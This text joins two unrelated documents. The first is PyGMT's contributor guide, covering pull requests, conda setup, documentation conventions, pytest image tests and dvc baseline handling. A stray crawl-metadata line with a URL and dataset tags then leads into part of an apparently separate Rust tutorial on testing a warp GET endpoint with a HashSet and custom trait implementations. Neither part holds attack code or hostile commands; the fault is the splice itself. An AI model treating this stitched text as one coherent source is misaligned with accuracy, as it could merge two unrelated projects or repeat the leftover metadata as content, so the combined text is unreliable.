Each pull request should consist of a small and logical collection of changes; larger changes should be broken down into smaller parts and integrated separately.
Bug fixes should be submitted in separate PRs.
How to write and submit a PR
Use underscores for all Python (*.py) files as per PEP8, not hyphens. Directory names should also use underscores instead of hyphens.
Describe what your PR changes and why this is a good thing. Be as specific as you can. The PR description is how we keep track of the changes made to the project over time.
Do not commit changes to files that are irrelevant to your feature or bugfix (e.g.:
.gitignore, IDE project files, etc).
Write descriptive commit messages. Chris Beams has written a guide on how to write good commit messages.
PR review
Be willing to accept criticism and work on improving your code; we don’t want to break other users’ code, so care must be taken not to introduce bugs.
Be aware that the pull request review process is not immediate, and is generally proportional to the size of the pull request.
General Process for Pull Request Review:
After you’ve submitted a pull request, you should expect to hear at least a comment within a couple of days. We may suggest some changes, improvements or alternative implementation details.
To increase the chances of getting your pull request accepted quickly, try to:
Submit a friendly PR
Write a good and detailed description of what the PR does.
Write some documentation for your code (docstrings) and leave comments explaining the reason behind non-obvious things.
Write tests for the code you wrote/modified if needed. Please refer to Testing your code or Testing plots.
Include an example of new features in the gallery or tutorials. Please refer to Gallery plots or Tutorials.
Have a good coding style
Use readable code, as it is better than clever code (even with comments).
Follow the PEP8 style guide for code and the NumPy style guide for docstrings. Please refer to Code style.
Pull requests will automatically have tests run by GitHub Actions. This includes running both the unit tests as well as code linters. GitHub will show the status of these checks on the pull request. Try to get them all passing (green). If you have any trouble, leave a comment in the PR or get in touch.
Setting up your Environment
These steps for setting up your environment are necessary for editing the documentation locally and contributing code. A local PyGMT development environment is not needed for editing the documentation on GitHub.
We highly recommend using Anaconda and the
conda
package manager to install and manage your Python packages.
It will make your life a lot easier!
The repository includes a conda environment file
environment.yml with the
specification for all development requirements to build and test the project.
In particular, these are some of the key development dependencies you will need
to install to build the documentation and run the unit tests locally:
git (for cloning the repo and tracking changes in code)
dvc (for downloading baseline images used in tests)
pytest-mpl (for checking that generated plots match the baseline)
sphinx-gallery (for building the gallery example page)
See the
environment.yml
file for the full list of dependencies and the environment name (
pygmt).
Once you have forked and cloned the repository to your local machine, you can
use this file to create an isolated environment on which you can work.
Run the following on the base of the repository to create a new conda
environment from the
environment.yml file:
conda env create --file environment.yml
Before building and testing the project, you have to activate the environment (you’ll need to do this every time you start a new terminal):
conda activate pygmt
We have a
Makefile
that provides commands for installing, running the tests and coverage analysis,
running linters, etc. If you don’t want to use
make, open the
Makefile and
copy the commands you want to run.
To install the current source code into your testing environment, run:
make install # on Linux/macOS pip install --no-deps -e . # on Windows
This installs your project in editable mode, meaning that changes made to the source code will be available when you import the package (even if you’re on a different directory).
Contributing Documentation
PyGMT Documentation Overview
There are four main components to PyGMT’s documentation:
Gallery examples, with source code in Python
*.pyfiles under the
examples/gallery/folder.
Tutorial examples, with source code in Python
*.pyfiles under the
examples/tutorials/folder.
API documentation, with source code in the docstrings in Python
*.pyfiles under the
pygmt/src/and
pygmt/datasets/folders.
Getting started/developer documentation, with source text in ReST
*.rstand markdown
*.mdfiles under the
doc/folder.
The documentation are written primarily in reStructuredText and built by Sphinx. Please refer to reStructuredText Cheatsheet if you are new to reStructuredText. When contributing documentation, be sure to follow the general guidelines in the pull request workflow section.
There are two primary ways to edit the PyGMT documentation:
For simple documentation changes, you can easily edit the documentation on GitHub. This only requires you to have a GitHub account.
For more complicated changes, you can edit the documentation locally. In order to build the documentation locally, you first need to set up your environment.
Editing the Documentation on GitHub
If you’re browsing the documentation and notice a typo or something that could be improved, please consider letting us know by creating an issue or (even better) submitting a fix.
You can submit fixes to the documentation pages completely online without having to download and install anything:
On each documentation page, there should be an “Improve This Page” link at the very top.
Click on that link to open the respective source file (usually an
.rstfile in the
doc/folder or a
.pyfile in the
examples/folder) on GitHub for editing online (you’ll need a GitHub account).
Make your desired changes.
When you’re done, scroll to the bottom of the page.
Fill out the two fields under “Commit changes”: the first is a short title describing your fixes; the second is a more detailed description of the changes. Try to be as detailed as possible and describe why you changed something.
Choose “Create a new branch for this commit and start a pull request” and click on the “Propose changes” button to open a pull request.
The pull request will run the GMT automated tests and make a preview deployment. You can see how your change looks in the PyGMT documentation by clicking the “View deployment” button after the Vercel bot has finished (usually 5-10 minutes after the pull request was created).
We’ll review your pull request, recommend changes if necessary, and then merge them in if everything is OK.
Done!
Alternatively, you can make the changes offline to the files in the
doc folder or the
example scripts. See editing the documentation locally
for instructions.
Editing the Documentation Locally
For more extensive changes, you can edit the documentation in your cloned repository and build the documentation to preview changes before submitting a pull request. First, follow the setting up your environment instructions. After making your changes, you can build the HTML files from sources using:
cd doc make all
This will build the HTML files in
doc/_build/html.
Open
doc/_build/html/index.html in your browser to view the pages. Follow the
pull request workflow to submit your changes for review.
Adding example code
Many of the PyGMT functions have example code in their documentation. To contribute an
example, add an “Example” header and put the example code below it. Have all lines
begin with
>>>. To keep this example code from being run during testing, add the code
__doctest_skip__ = [function name] to the top of the module.
Inline code example
Below the import statements at the top of the file
__doctest_skip__ = ["module_name"]
At the end of the function’s docstring
Example ------- >>> import pygmt >>> # Comment describing what is happening >>> Code example
Contributing Gallery Plots
The gallery and tutorials are managed by
sphinx-gallery.
The source files for the example gallery are
.py scripts in
examples/gallery/ that
generate one or more figures. They are executed automatically by sphinx-gallery when
the documentation is built. The output is gathered and
assembled into the gallery.
You can add a new plot by placing a new
.py file in one of the folders inside the
examples/gallery folder of the repository. See the other examples to get an idea for the
format.
General guidelines for making a good gallery plot:
Examples should highlight a single feature/command. Good: how to add a label to a colorbar. Bad: how to add a label to the colorbar and use two different CPTs and use subplots.
Try to make the example as simple as possible. Good: use only commands that are required to show the feature you want to highlight. Bad: use advanced/complex Python features to make the code smaller.
Use a sample dataset from
pygmt.datasetsif you need to plot data. If a suitable dataset isn’t available, open an issue requesting one and we’ll work together to add it.
Add comments to explain things are aren’t obvious from reading the code. Good: Use a Mercator projection and make the plot 15 centimeters wide. Bad: Draw coastlines and plot the data.
Describe the feature that you’re showcasing and link to other relevant parts of the documentation.
SI units should be used in the example code for gallery plots.
Contributing Tutorials
The tutorials (the User Guide in the docs) are also built by sphinx-gallery from the
.py files in the
examples/tutorials folder of the repository. To add a new tutorial:
Create a
.pyfile in the
examples/tutorials/advancedfolder.
Write the tutorial in “notebook” style with code mixed with paragraphs explaining what is being done. See the other tutorials for the format.
Choose the most representative figure as the thumbnail figure by adding a comment line
# sphinx_gallery_thumbnail_number = <fig_number>to any place (usually at the top) in the tutorial. The fig_number starts from 1.
Guidelines for a good tutorial:
Each tutorial should focus on a particular set of tasks that a user might want to accomplish: plotting grids, interpolation, configuring the frame, projections, etc.
The tutorial code should be as simple as possible. Avoid using advanced/complex Python features or abbreviations.
Explain the options and features in as much detail as possible. The gallery has concise examples while the tutorials are detailed and full of text.
SI units should be used in the example code for tutorial plots.
Note that the
Figure.show() function needs to be called for a plot to be inserted into
the documentation.
Editing the API Documentation
The API documentation is built from the docstrings in the Python
*.py files under
the
pygmt/src/ and
/pygmt/datasets/ folders. All docstrings should follow the
NumPy style guide.
All functions/classes/methods should have docstrings with a full description of all
arguments and return values.
While the maximum line length for code is automatically set by Black, docstrings must be formatted manually. To play nicely with Jupyter and IPython, keep docstrings limited to 79 characters per line.
Standards for Example Code
When editing documentation, use the following standards to demonstrate the example code:
Python arguments, such as import statements, Boolean expressions, and function arguments should be wrapped as
codeby using `` on both sides of the code. Examples: ``import pygmt`` results in
import pygmt, ``True`` results in
True, ``style=”v”`` results in
style="v".
Literal GMT arguments should be bold by wrapping the arguments with ** (two asterisks) on both sides. The argument description should be in italicized with * (single asterisk) on both sides. Examples:
**+l**\ *label*results in +llabel,
**05m**results in 05m.
Optional arguments are wrapped with [ ] (square brackets).
Arguments that are mutually exclusive are separated with a | (bar) to denote “or”.
Default arguments for parameters and configuration settings are wrapped with [ ] (square brackers) with the prefix “Default is”. Example: [Default is p].
Cross-referencing with Sphinx
The API reference is manually assembled in
doc/api/index.rst.
The autodoc sphinx extension will automatically create pages for each
function/class/module/method listed there.
You can reference functions, classes, modules, and methods from anywhere (including docstrings) using:
:func:`package.module.function`
:class:`package.module.class`
:meth:`package.module.method`
:mod:`package.module`
An example would be to use
:meth:`pygmt.Figure.grdview` to link
to.
PyGMT documentation that is not a class, method,
or module can be linked with
:doc:`Any Link Text </path/to/the/file>`.
For example,
:doc:`Install instructions </install>` links
to.
Linking to the GMT documentation and GMT configuration parameters can be done using:
:gmt-docs:`page_name.html`
:gmt-term:`GMT_PARAMETER`
An example would be using
:gmt-docs:`makecpt.html` to link to.
For GMT configuration parameters, an example is
:gmt-term:`COLOR_FOREGROUND` to link to.
Sphinx will create a link to the automatically generated page for that function/class/module/method.
Contributing Code
PyGMT Code Overview
The source code for PyGMT is located in the
pygmt/ directory. When contributing
code, be sure to follow the general guidelines in the
pull request workflow section.
Code Style
We use some tools to to format the code so we don’t have to think about it:
Black and blackdoc loosely follows the PEP8 guide but with a few differences. Regardless, you won’t have to worry about formatting the code yourself. Before committing, run it to automatically format your code:
make format
For consistency, we also use UNIX-style line endings (
\n) and file permission
644 (
-rw-r--r--) throughout the whole project.
Don’t worry if you forget to do it. Our continuous integration systems will
warn us and you can make a new commit with the formatted code.
Even better, you can just write
/format in the first line of any comment in a
Pull Request to lint the code automatically.
When wrapping a new alias, use an underscore to separate words bridged by vowels
(aeiou), such as
no_skip and
z_only. Do not use an underscore to separate
words bridged only by consonants, such as
distcalc, and
crossprofile. This
convention is not applied by the code checking tools, but the PyGMT maintainers
will comment on any pull requests as needed.
We also use flake8 and
pylint to check the quality of the code and quickly catch
common errors.
The
Makefile
contains rules for running both checks:
make check # Runs black, blackdoc, docformatter, flake8 and isort (in check mode) make lint # Runs pylint, which is a bit slower
Testing your Code
Automated testing helps ensure that our code is as free of bugs as it can be. It also lets us know immediately if a change we make breaks any other part of the code.
All of our test code and data are stored in the
tests subpackage.
We use the pytest framework to run the test suite.
Please write tests for your code so that we can be sure that it won’t break any of the existing functionality. Tests also help us be confident that we won’t break your code in the future.
When writing tests, don’t test everything that the GMT function already tests, such as
the every unique combination arguments. An exception to this would be the most popular
methods, such as
plot and
basemap. The highest priority for tests should be the
Python-specific code, such as numpy, pandas, and xarray objects and the virtualfile
mechanism.
If you’re new to testing, see existing test files for examples of things to do. Don’t let the tests keep you from submitting your contribution! If you’re not sure how to do this or are having trouble, submit your pull request anyway. We will help you create the tests and sort out any kind of problem during code review.
Pull the baseline images, run the tests, and calculate test coverage using:
dvc status # should report any files 'not_in_cache' dvc pull # pull down files from DVC remote cache (fetch + checkout) make test
The coverage report will let you know which lines of code are touched by the tests.
If all the tests pass, you can view the coverage reports by opening
htmlcov/index.html
in your browser. Strive to get 100% coverage for the lines you changed.
It’s OK if you can’t or don’t know how to test something.
Leave a comment in the PR and we’ll help you out.
You can also run tests in just one test script using:
pytest pygmt/tests/NAME_OF_TEST_FILE.py
or run tests which contain names that match a specific keyword expression:
pytest -k KEYWORD pygmt/tests
Testing Plots
Writing an image-based test is only slightly more difficult than a simple test.
The main consideration is that you must specify the “baseline” or reference
image, and compare it with a “generated” or test image. This is handled using
the decorator functions
@pytest.mark.mpl_image_compare and
@check_figures_equal
whose usage are further described below.
Using mpl_image_compare
This is the preferred way to test plots whenever possible.
This method uses the pytest-mpl
plug-in to test plot generating code.
Every time the tests are run,
pytest-mpl compares the generated plots with known
correct ones stored in
pygmt/tests/baseline.
If your test created a
pygmt.Figure object, you can test it by adding a decorator and
returning the
pygmt.Figure object:
@pytest.mark.mpl_image_compare def test_my_plotting_case(): "Test that my plotting function works" fig = Figure() fig.basemap(region=[0, 360, -90, 90], projection='W7i', frame=True) return fig
Your test function must return the
pygmt.Figure object and you can only
test one figure per function.
Before you can run your test, you’ll need to generate a baseline (a correct version) of your plot. Run the following from the repository root:
pytest --mpl-generate-path=baseline pygmt/tests/NAME_OF_TEST_FILE.py
This will create a
baseline folder with all the plots generated in your test
file.
Visually inspect the one corresponding to your test function.
If it’s correct, copy it (and only it) to
pygmt/tests/baseline.
When you run
make test the next time, your test should be executed and
passing.
Don’t forget to commit the baseline image as well!
The images should be pushed up into a remote repository using
dvc (instead of
git) as will be explained in the next section.
Using Data Version Control (dvc) to Manage Test Images
As the baseline images are quite large blob files that can change often (e.g.
with new GMT versions), it is not ideal to store them in
git (which is meant
for tracking plain text files). Instead, we will use
dvc
which is like
git but for data. What
dvc does is to store the hash (md5sum)
of a file. For example, given an image file like
test_logo.png,
dvc will
generate a
test_logo.png.dvc plain text file containing the hash of the
image. This
test_logo.png.dvc file can be stored as usual on GitHub, while
the
test_logo.png file can be stored separately on our
dvc remote at.
To pull or sync files from the
dvc remote to your local repository, use
the commands below. Note how
dvc commands are very similar to
git.
dvc status # should report any files 'not_in_cache' dvc pull # pull down files from DVC remote cache (fetch + checkout)
Once the sync/download is complete, you should notice two things. There will be
images stored in the
pygmt/tests/baseline folder (e.g.
test_logo.png) and
these images are technically reflinks/symlinks/copies of the files under the
.dvc/cache folder. You can now run the image comparison test suite as per
usual.
pytest pygmt/tests/test_logo.py # run only one test make test # run the entire test suite
To push or sync changes from your local repository up to the
dvc remote
at DAGsHub, you will first need to set up authentication using the commands
below. This only needs to be done once, i.e. the first time you contribute a
test image to the PyGMT project.
dvc remote modify upstream --local auth basic dvc remote modify upstream --local user "$DAGSHUB_USER" dvc remote modify upstream --local password "$DAGSHUB_PASS"
The configuration will be stored inside your
.dvc/config.local file. Note
that the $DAGSHUB_PASS token can be generated at
after creating a DAGsHub account (can be linked to your GitHub account). Once
you have an account set up, please ask one of the PyGMT maintainers to add you
as a collaborator at
before proceeding with the next steps.
The entire workflow for generating or modifying baseline test images can be summarized as follows:
# Sync with both git and dvc remotes git pull dvc pull # Generate new baseline images pytest --mpl-generate-path=baseline pygmt/tests/test_logo.py mv baseline/*.png pygmt/tests/baseline/ # Generate hash for baseline image and stage the *.dvc file in git dvc status # check which files need to be added to dvc dvc add pygmt/tests/baseline/test_logo.png git add pygmt/tests/baseline/test_logo.png.dvc # Commit changes and push to both the git and dvc remotes git commit -m "Add test_logo.png into DVC" dvc status --remote upstream # Report which files will be pushed to the dvc remote dvc push # Run before git push to enable automated testing with the new images git push
Using check_figures_equal
This approach draws the same figure using two different methods (the reference
method and the tested method), and checks that both of them are the same.
It takes two
pygmt.Figure objects (‘fig_ref’ and ‘fig_test’), generates a png
image, and checks for the Root Mean Square (RMS) error between the two.
Here’s an example:
@check_figures_equal() def test_my_plotting_case(): "Test that my plotting function works" fig_ref, fig_test = Figure(), Figure() fig_ref.grdimage("@earth_relief_01d_g", projection="W120/15c", cmap="geo") fig_test.grdimage(grid, projection="W120/15c", cmap="geo") return fig_ref, fig_test | https://www.pygmt.org/dev/contributing.html | CC-MAIN-2022-27 | en | refinedweb |
Hi
I run the below program which publishes to a service SERVICE on TREP using the latest RFA.net api.
It publishes 2 instruments in /exactly/ the same way but for the instrument anderstest4 the published change does not stick, regardless of the order in which I publish the instruments (or whether I publish both or not).
Furthermore, both publications receive positive acknowledgment from TREP.
There is no issue doing exactly the same using the EMA api, going through the same endpoint.
Why does TREP discard the publications for certain instruments when they come from the RFA.net api but not from EMA?
SERVICE is an internal service with a persistent cache that we update with post messages.
static void Main(string[] args)
{
Random rng = new Random();
stalltest("anderstest4", rng.NextDouble().ToString());
stalltest("anderstest42", rng.NextDouble().ToString());
}
static void stalltest(string instrument, string testvalue)
{
Realtime.TREP.Request request = Realtime.TREP.Request.As(Environment.UserName, "UAT");
var sf = request.MarketAccessTo("SERVICE");
using (var form = sf.CreatePublishingFormStream())
{
form.FillOut(instrument, "QUERY", testvalue);
form.Submit();
System.Threading.Thread.Sleep(100);
}
using (var image = sf.CreateSnapshotSubscription(new[] { instrument }, new[] { "QUERY" }))
{
string test = image.TakeSnapshot()[instrument, "QUERY"].FieldValue;
if (test != testvalue)
{
Console.WriteLine(instrument + " stalled!");
}
else
{
Console.WriteLine(instrument + " works as expected.");
}
}
}
it prints out
anderstest4 stalled!
anderstest42 works as expected.
The PublishingFormStream posts PostMsg objects off-stream with a FieldList as payload.
The FieldList contains the FID for the QUERY field and a RMTES string encoding the random double as a string.
The anderstest4 instrument was created with exactly the same code and has worked fine for some time, until it suddenly got stuck. This happens daily for other instrument that we create and publish to. We currently can't use the RFA.net api for publishing our updates because of this.
We're using ADH version adh3.2.0.L1.linux.tis.rrg 64-bit .
Sincerely
Anders A. Søndergaard
Thanks for confirming that you are indeed populating the databuffer correctly - just needed to be eliminate that possibility - as this is a common mistake we have seen being made by other developers.
Also thanks for sharing the the 2nd trace file where you published 'umer' to the same fid for the two different instruments. I can see that on the outgoing post the identical data is being sent:
PostMsg anderstest42 <fieldEntry fieldId="32650" data="1B25 3075 6D65 72"/>
PostMsg anderstest4 <fieldEntry fieldId="32650" data="1B25 3075 6D65 72"/>
This confirms that the API and your application is working and encoding the outgoing payload correctly.
However, when you subscribe to the items we get back different values.
Refresh anderstest42 <fieldEntry fieldId="32650" data="1B25 3075 6D65 72"/>
Refresh anderstest4 <fieldEntry fieldId="32650" data="7465 7374 3437"/>
This indicates that the problem lies elsewhere i.e. the TREP infrastructure components.
As per my initial post, I recommend you speak to your Market Data team so they can check if there is anything reported in their TREP logs.
If they confirm that they do not see any issues reported, then I recommend they raise a support ticket with our TREP support team.
If your Market Data team passes on the Trace files you have generated, they will provide evidence that your application is behaving correctly and publishing the right data and that the problem lies somewhere in TREP.
One final thing you could try - just for elimination purpose is to remove the '1B 25 30' bytes from the RMTES String payload -
e.g. something like
dataBuffer.SetFromString(value, DataBuffer.DataBufferEnum.StringRMTES)
- and run the test again with ASCII only string value as per your above tests.
As you say, if it works once it should work a 2nd time, but I just want to eliminate the possibility that TREP is perhaps occasionally not coping well this switching function.
I tried recreating your scenario here and published two RICs in sequence with identical payload including FID 32650 and I could not get it to fail (with or without the above 3 bytes).
The above code does not resemble RFA.NET code - I can only assume you are using some internal wrapper? Without sight of the actual underlying RFA.net code it would not be possible to confirm if there are any issues with said code.
There a couple of things to try:
If you have access to the RFA config files, you can enable the low level trace using the following parameters:
\Connections\<Connection_RSSL>\traceMsgToFile = True \Connections\<Connection_RSSL>\traceMsgFileName = "<your trace file location and name>"
where <Connection_RSSL> should be replaced with the actual connection being used by whichever Session you acquire from the config.
Trace attached rfatrace_5984.txt
The point I want to get across is that the code is working in general, except for particular instruments. That means it's unlikely to be an issue with the code.
The code that calls the RFA looks like this
this.Msg.Clear();
this.Attrib.Clear();
Attrib.ServiceName = RFAserviceName; // i.e. new RFA_String("SERVICE")
Attrib.NameType = RDM.INSTRUMENT_NAME_TYPES.INSTRUMENT_NAME_RIC;
Attrib.Name = new RFA_String(instrument);
Msg.AttribInfo = Attrib;
Msg.MsgModelType = RDM.MESSAGE_MODEL_TYPES.MMT_MARKET_PRICE;
Msg.IndicationMask = PostMsg.IndicationMaskFlag.MessageInit | PostMsg.IndicationMaskFlag.MessageComplete;
Msg.IndicationMask |= PostMsg.IndicationMaskFlag.WantAck;
Msg.SeqNum = PostID; // don't need the fine granularity provided by seqnum. Just set it to postId.
Msg.PostID = PostID;
if ((Msg.HintMask & PostMsg.HintMaskFlag.Seq) == 0) throw new System.Exception("Flag not set");
pendingAcks.Add(PostID, new AckInfo { InstrumentName = instrument });
++PostID;
{
FieldList container = new FieldList();
container.Clear();
container.SetInfo(this.RDMdict.DictId, (short)Dictionary.DICTIONARY_TYPES.DICTIONARY_RECORD_TEMPLATES);
flItr.Start(container);
foreach (var field in instrumentForm.Fields)
{
msgEntry.Clear();
msgEntry.FieldID = field.Key;
msgEntry.Data = field.Value;
flItr.Bind(msgEntry);
}
flItr.Complete();
Msg.Payload = container;
}
OMMHandleItemCmd cmd = new OMMHandleItemCmd();
cmd.Handle = this.loginHandler.LoginStreamHandle; // Off-stream posting, using our loginHandlers stream (and its event handler for ack messages)
cmd.Msg = Msg;
consumer.Submit(cmd);
As mentioned, without your underlying code, it is difficult to investigate what is going wrong.
However, based on the trace I can see that data being sent to server for two instruments is different in length.
For anderstest42 your application is sending the following value:
<fieldEntry fieldId="32650" data="1B25 3030 2E39 3132 3632 3734 3138 3031 3931 37"/>
For anderstest4 your application is sending the following value:
<fieldEntry fieldId="32650" data="1B25 3030 2E35 3438 3830 3038 3235 3836 3235 3837"/>
When you then subscribe to those items, you are receiving back the following payload:
for anderstest42:
<fieldEntry fieldId="32650" data="1B25 3030 2E39 3132 3632 3734 3138 3031 3931 37"/>
and for anderstest4:
<fieldEntry fieldId="32650" data="7465 7374 3437"/>
incidentally - the above hex data converts to 'test47' - does this mean anything to you?
What are you contributing the data to - what does service 'SERVICE' represent? Is it some contributions engine, which perhaps has some rules defined for what length/values it can accept for the fid 32650 and is therefore being rejected? You may well get an ACK from the ADS because it considers the post a valid post msg format, but it is then being discarded by the upstream server.
Also, I should point out that your current wrapper implementation is incredibly inefficient - just in that single trace file you are performing connect, login, source directory download, logout, disconnect four times - which is a considerable overhead given that you are only posting and subscribing two items.
As a test - please post the identical value to the field for both anderstest4 and anderstest42 and see what happens.
The "test47" string is what the field value is from before my test, set by another client using the EMA api.
I've already told you everything I know about SERVICE. It's an internal persistent cache that's only updated with Post message, configured in the ADH. No interactive providers are attached to it.
The wrapper code is deliberately inefficient during upstart. It is however a lot more efficient than the raw RFA api in terms of developer time spent coding stuff, and it does not sacrifice performance once a subscription is established.
New trace attached where I send the string "umer". rfatrace_332.txt
Thanks for sharing the code. I cannot see how instrumentForm.Fields and its constituent Value are populated, so cannot be sure if the FieldEntry.Data is being populated with the correct DataBuffer content.
Please see attached file for an example of how FieldEntry.Data is populated for different field types e.g. for a string type field (such as 32650):
field.FieldID = 296 // Ask MMID 1 - Alphanumeric/RMTEST_STRING field RFA_String AskStr = new RFA_String("Ask MMID data"); dataBuffer.SetFromString(AskStr, DataBuffer.DataBufferEnum.StringRMTES); field.Data = dataBuffer; fieldListWIt.Bind(field);
The attached code is extracted from the Encoder.cs file which can be found in the Examples\Common\ folder of the RFA.NET SDK.
Logically, and as you can verify from the trace, instrumentForm.Fields and its constituent Value must be populated properly since it works for one instrument but not the other, having run exactly the same code with only the instrument name differing.
Anyway here is the code if you want to prove me wrong
public void FillOut(string instrument, string field, object value)
{
RDMFidDef def = GetFidDef(field);
Open(instrument).Fields[def.FieldId] = Encoder.Encode(def, value);
}
public Data Encode(RDMFidDef fidDef, object value)
{
byte type_indicator = RFATypes.OMMType2DataBufferEnum(fidDef);
return Encode(type_indicator, value);
}
switch (fidDef.OMMType)
{
case OMMTypeEnum.RWF_TYPE_XML:
return DataBuffer.DataBufferEnum.XML;
case OMMTypeEnum.RWF_TYPE_OPAQUE:
return DataBuffer.DataBufferEnum.Opaque;
case OMMTypeEnum.RWF_TYPE_RMTES_STRING:
return DataBuffer.DataBufferEnum.StringRMTES;
case OMMTypeEnum.RWF_TYPE_UTF8_STRING:
return DataBuffer.DataBufferEnum.StringUTF8;
case OMMTypeEnum.RWF_TYPE_ASCII_STRING:
return DataBuffer.DataBufferEnum.StringAscii;
case OMMTypeEnum.RWF_TYPE_DATE_TIME:
return DataBuffer.DataBufferEnum.DateTime;
case OMMTypeEnum.RWF_TYPE_TIME:
return DataBuffer.DataBufferEnum.Time;
case OMMTypeEnum.RWF_TYPE_DATE:
return DataBuffer.DataBufferEnum.Date;
case OMMTypeEnum.RWF_TYPE_REAL:
return DataBuffer.DataBufferEnum.Real;
case OMMTypeEnum.RWF_TYPE_DOUBLE:
return DataBuffer.DataBufferEnum.Double;
case OMMTypeEnum.RWF_TYPE_FLOAT:
return DataBuffer.DataBufferEnum.Float;
etc etc etc
private Data Encode(byte type_indicator, object value, ErrMsgr default_prepend) {
DataBuffer result = new DataBuffer();
if (value == null)
{
result.SetBlankData(type_indicator);
return result;
}
switch (type_indicator) {
case DataBufferEnum.StringRMTES: // A nice string type with a private encoding scheme and no public encoder for it.
byte[] utf8_part = Encoding.UTF8.GetBytes(dynamic_cast<string>(value, default_prepend)); // The RMTESConverter is one-way only.
byte[] rmtes = new byte[3 + utf8_part.LongLength]; // Tell the RMTES string that we contain utf8.
new byte[] { 0x1B, 0x25, 0x30 }.CopyTo(rmtes, 0); // see
utf8_part.CopyTo(rmtes, 3);
result.SetBuffer(new ThomsonReuters.RFA.Common.Buffer(rmtes), type_indicator);
break;
case DataBufferEnum.StringUTF8:
case DataBufferEnum.XML:
result.SetBuffer(new ThomsonReuters.RFA.Common.Buffer(Encoding.UTF8.GetBytes(dynamic_cast<string>(value, default_prepend))), type_indicator);
break;
case DataBufferEnum.StringAscii:
result.SetFromString(new RFA_String(dynamic_cast<string>(value, default_prepend)), type_indicator);
break;
case DataBufferEnum.Double:
result.SetDouble(dynamic_cast<double>(value, default_prepend),type_indicator);
break
case DataBufferEnum.Real: // Radix 10 floating point number implementation (!?)
result.SetFromString(new RFA_String(dynamic_cast<double>(value, default_prepend).ToString()), type_indicator);
break;
etc etc etc
static T dynamic_cast<T>(object value, ErrMsgr prepend_err = null)
{
try
{
return (T)(dynamic)value;
}
catch ....
Anders
Hi Umer
Thanks for confirming that our implementation is correct.
Thanks also for the suggestion. I tried the SetFromString() method with the same result.
You off course also need the source code in case it turns out to be a bug in the RFA api.
The issue is a tricky to reproduce. We use some instruments and suddenly they freeze and cannot be updated nor deleted by the RFA api. Oddly, the EMA api work fine. It can change the stuck instruments, but it doesn't get them unstuck for RFA.net.
The freezing typically happens after a few minutes of use, disconnecting, connecting, and re-requesting etc. After it gets stuck we can't get them unstuck.
I'll revert back to our market data team.
Thanks for the update.
It is very odd what you are seeing - as the underlying Reuters Wire Format is used by both RFA and EMA - if you enable the low level trace in EMA you should see the same PostMsg being sent to the server as per your RFA code.
It would be interesting to see if there any subtle differences at your end between the APIs in the trace messages...
Good idea. Unfortunately I don't have immediate access to the other implementation, but will forward your request.
Other than being different, the other code was run from another location (actually another country, but hitting the same TREP instance). We tried using the same credentials (username, appid, network position) from RFA with the same result - stuck instrument.
Anders | https://community.developers.refinitiv.com/questions/54033/stuck-instruments-when-posting.html?sort=oldest | CC-MAIN-2022-27 | en | refinedweb |
Welcome back! Last time we saw each other I wrote:
Next in line is the
GETmethod, which means we'll see parameter handling and (finally) deal with this HashSet thing.
So, "let us not waste our time in idle discourse!"
Warp 3, make it so!
The code for this part is available here.
First, I needed another dependency to help me deserialize the
GET return, so I changed the
Cargo.toml file:
serde_json = "1.0"
Then, the time came to change
try_list(). As of our last encounter, this test had only a
request() and the
assert_eq!. I added two things:
- Before the request, I manually inserted two entries into the HashSet (I could've called
POST, but since it is already being tested elsewhere, it is ok to take this shortcut);
- After the request, I deserialized the HTML body and compared its content to the data I had previously inserted.
There's a chance that a few things will appear weird, but don't worry, I will go through each one of them.
use std::collections::HashSet; #[tokio::test] async fn try_list() { use std::str; use serde_json; let simulation1 = models::Simulation{ id: 1, name: String::from("The Big Goodbye"), }; let simulation2 = models::Simulation{ id: 2, name: String::from("Bride Of Chaotica!"), }; let db = models::new_db(); db.lock().await.insert(simulation1.clone()); db.lock().await.insert(simulation2.clone()); let api = filters::list_sims(db); let response = request() .method("GET") .path("/holodeck") .reply(&api) .await; let result: Vec<u8> = response.into_body().into_iter().collect(); let result = str::from_utf8(&result).unwrap(); let result: HashSet<models::Simulation> = serde_json::from_str(result).unwrap(); assert_eq!(models::get_simulation(&result, 1).unwrap(), &simulation1); assert_eq!(models::get_simulation(&result, 2).unwrap(), &simulation2); let response = request() .method("GET") .path("/holodeck/2") .reply(&api) .await; let result: Vec<u8> = response.into_body().into_iter().collect(); let result = str::from_utf8(&result).unwrap(); let result: HashSet<models::Simulation> = serde_json::from_str(result).unwrap(); assert_eq!(result.len(),1); assert_eq!(models::get_simulation(&result, 2).unwrap(), &simulation2); }
The first thing I take as deserving an explanation is the
db.lock().await.insert(). The
lock() gives you what's inside the Arc, and in this case, it returns a Future. Why? Because we are not using
std::sync::Mutex, but
tokio::sync::Mutex, which is an Async implementation of the former. That's why we don't
unwrap(), but instead
await, as we need to suspend execution until the result of the Future is ready.
Moving on,
filters::list_sims() is now getting a parameter, which is the data it will return (which, in a real execution, would come from the HTTP body).
After the request—that remains the same—there are three lines of Bytes-handling-jibber-jabber.
Bytes is the format with which warp's RequestBuilder handles the HTML body content. It looks like a [u8] (that is, an array of the primitive u8], but it is a little bit more painful to handle. What I did with it, however, is simple. I:
- Mapped its content to a Vector of u8
- Moved the Vector's content to the slice
- Used
serde_json::from_str()function to map it to the Simulation struct inside the HashSet.
And this is one of the reasons I wanted a HashSet. As far as I know, standard Rust doesn't allow you to create a HashMap referring to a struct of two fields; that is, you cannot do that:
\\ This code is not in the project! struct Example { id: u64, name: String, } type Impossible = HashMap<Example>;
And without using a struct as I did with the HashMap (as well as the cool kids did with Vector here at line 205), using
serde gets... complicated (which means I have no idea how to do it).
Nonetheless, there is another reason why I wanted to stick the struct within the HashSet: it gave me the chance to implement some traits for my type.
Before diving into the traits, I would like to explain the last part of the test (which should be a different test, but the example is already too big).
The
GET method can be used in three different ways:
- Fetch all the entries:
/holodeck
- Fetch a single entry:
/holodeck/:id
- Fetch filtered entries:
/holodeck/?search=query
This last
request() using path
/holodeck/2 was written to cover the second case. I did not (and will not) develop the third one.
Boldly implementing traits
If you compare the HashSet element with another, it will compare everything. That's no good if you have a key-value-pair struct. As I didn't want to use HashMap because of the aforementioned reasons, the way to go is to change this behavior, making comparisons only care about the id.
First, I brought
Hash and
Hasher, then I removed the
Eq,
PartialEq and
Hash, so I could implement them myself. And the implementation was this:
use std::hash::{Hash, Hasher}; #[derive(Clone, Debug, Deserialize, Serialize)] pub struct Simulation { pub id: u64, pub name: String, } impl PartialEq for Simulation{ fn eq(&self, other: &Self) -> bool { self.id == other.id } } impl Eq for Simulation {} impl Hash for Simulation{ fn hash<H: Hasher>(&self, state: &mut H){ self.id.hash(state); } }
